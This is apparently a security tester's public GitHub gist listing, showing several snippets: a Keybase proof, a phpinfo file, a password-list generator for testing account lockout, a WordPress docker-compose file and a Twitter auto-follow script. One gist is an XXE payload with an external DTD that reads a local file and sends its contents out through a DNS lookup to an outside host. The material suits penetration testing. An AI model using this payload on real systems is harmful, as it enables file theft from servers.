I hereby claim:
- I am marcwickenden on github.
- I am marcwickenden (https://keybase.io/marcwickenden) on keybase.
- I have a public key ASD0R4SdJk8CnPiG_t4Y1LGCIbFQXlEM19O45DsoU4fMSwo
To claim this, I am signing this object:
MW marcwickenden
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php phpinfo(); ?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" ?> | |
| <!DOCTYPE x [ | |
| <!ENTITY % oobfile SYSTEM "https://gist.githubusercontent.com/marcwickenden/acd0b23953b52e7c1a1a90925862d8e2/raw/98f3a015c12aa2d3288376281040ec003961c6dc/oob-dns.xml"> | |
| %oobfile; | |
| %url; | |
| %exfil; | |
| ]> | |
| <x></x> |
marcwickenden
/ oob-dns.xml
Created
May 16, 2018 17:27
Example of data exfil using DNS in XXE. This will only work if the target file (/tmp/foo in this case) does not contain new lines. Good luck with that!
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!ENTITY % data SYSTEM "file:///tmp/foo"> | |
| <!ENTITY % url "<!ENTITY % exfil SYSTEM 'http://%data;.127.0.0.1.xip.io/capture'>"> |
marcwickenden
/ phpinfo.php
Created
May 16, 2018 15:27
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php phpinfo(); ?> |
marcwickenden
/ generate-intruder-passwords.sh
Created
August 3, 2017 11:28
Generate payloads for testing account lockout with Intruder
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Usage: ./generate-intruder-passwords ThisisthecorrectPassword123 20 | |
| # | |
| # The first argument is the correct password for the app. | |
| # The second argument is the maximum number of password attempts to make. | |
| # 20 is the default, if it hasn't locked you by then I'd say that's a finding. | |
| # | |
| # The script will simply increment up to $LIMIT outputting n incorrect passwords and then the correct one. | |
| # We enter the correct one to potentially reset the incorrect count. |
marcwickenden
/ docker-compose.yml
Created
February 2, 2017 12:56
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| version: '2' | |
| services: | |
| wordpress: | |
| image: wordpress:4.7.1 | |
| ports: | |
| - 8080:80 | |
| environment: | |
| WORDPRESS_DB_PASSWORD: example |
marcwickenden
/ keybase.md
Last active
August 1, 2019 14:43
marcwickenden
/ 100sec.rb
Created
November 21, 2013 19:02
Automatically follow the @Marble_Security top-100-security-experts list members. If that's useful to you! You'll need to supply valid OAuth credentials from dev.twitter.com (read-write). You also need the twitter gem installed: gem install twitter Then just ruby 100sec.rb
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env ruby | |
| require 'twitter' | |
| Twitter.configure do |config| | |
| config.consumer_key = "<your consumer key>" | |
| config.consumer_secret = "<your consumer secret>" | |
| config.oauth_token = "<your oauth token>" | |
| config.oauth_token_secret = "<your oauth token secret>" | |
| end |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ ruby apache_user_agent.rb | |
| Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) | |
| SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html) | |
| Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| diff -ruw exim-4.80/doc/ChangeLog exim-4.80.1/doc/ChangeLog | |
| --- exim-4.80/doc/ChangeLog 2012-05-31 01:40:15.000000000 +0100 | |
| +++ exim-4.80.1/doc/ChangeLog 2012-10-25 04:37:38.000000000 +0100 | |
| @@ -1,6 +1,14 @@ | |
| Change log file for Exim from version 4.21 | |
| ------------------------------------------- | |
| +Exim version 4.80.1 | |
| +------------------- | |
| + |
NewerOlder